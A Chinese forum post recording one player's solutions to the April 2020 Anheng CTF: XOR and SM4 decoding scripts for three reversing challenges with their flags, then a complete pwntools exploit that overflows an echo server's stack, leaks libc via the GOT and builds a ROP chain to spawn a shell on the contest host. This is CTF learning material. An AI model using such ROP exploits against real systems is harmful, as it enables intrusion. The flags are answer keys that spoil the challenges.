Navigation

    喵了个咪乎

    • Register
    • Login
    • Search
    • Categories
    • Recent
    • Tags
    • Popular
    • Users
    • Groups

    0x02 - 2020安恒4月月赛记录

    学习打卡区
    1
    1
    5
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • B
      Bi0x last edited by Bi0x

      • 直接去博客看

      • Re简单是真滴简单,难是真滴难

      • 做一半睡着了

      Re - 入门reverse

      • 白给的题目,flag贴脸上
      str1 = "akhb~chdaZrdaZudqduvdZvvv|"
      flag = ''
      for i in str1:
          flag += chr((ord(i) - 1) ^ 6)
      print flag
      
      • flag{daef_wef_reverse_sss}

      Re - encrypt3

      • 比较懒,没进行认真的分析,直接爆破出flag了
      enc1 = [38, 44, 33, 39, 59,
              35, 34, 115, 117, 114,
              113, 33, 36, 117, 118,
              119, 35, 120, 38, 114,
              117, 113, 38, 34, 113,
              114, 117, 114, 36, 112,
              115, 118, 121, 112, 35,
              37, 121, 61]
      
      for i in range(128):
          flag = ''
          for j in enc1:
              flag += chr(j ^ i)
          if 'flag{' in flag:
              print flag
      
      • flag{cb3521ad567c8f251fb1252d03690ce9}

      Re - sm

      • 虽然知道是 sm 加密,猜测是 sm4,但是找了半天工具没找到

        • 然后就<del>睡着了</del>干别的去了
      • 结束后看一个师傅写有解密用的轮子

      • 通过程序猜测出 key 为 0x0123456789ABCDEFFEDCBA9876543210

        • 密文为 0xC079776677E5AC9931C567EB470645A7
      • 装完轮子尝试解密出 flag

      import pysm4
      
      key = 0x0123456789ABCDEFFEDCBA9876543210
      cipher = 0xC079776677E5AC9931C567EB470645A7
      dec = pysm4.decrypt(cipher, key)
      print hex(dec)[2:-1]
      
      • flag{d0389046c236e4c66bd787959f5c6e66}

      Pwn - echo server

      • 简单栈溢出,需要注意的就是要把栈指针劫持到 bss 段
      from pwn import *
      from LibcSearcher import LibcSearcher
      #io = process('./test')
      io = remote('183.129.189.60', 10061)
      elf = ELF('./test')
      
      buf_len = 0x80
      fakeebp = p64(elf.bss() + 0x500)
      
      start_addr = 0x00000000004005C0
      pop_rdi_addr = 0x0000000000400823
      retn_addr = 0x0000000000400824
      
      payload = '\0' * buf_len + fakeebp + p64(pop_rdi_addr) + \
          p64(elf.got['printf']) + p64(0x4006EE) + p64(start_addr)
      io.sendline('2333')
      io.sendline(payload)
      io.recvuntil('hello ')
      
      printf_libc_addr = u64(io.recv().ljust(8, '\x00'))
      libc = LibcSearcher('printf', printf_libc_addr)
      system_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('system')
      bin_sh_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('str_bin_sh')
      payload = '\0' * buf_len + fakeebp + p64(retn_addr) + p64(pop_rdi_addr) + p64(
          bin_sh_libc_addr) + p64(system_libc_addr) + p64(start_addr)
      
      io.sendline('2333')
      io.sendline(payload)
      io.interactive()
      
      1 Reply Last reply Reply Quote 0
      • First post
        Last post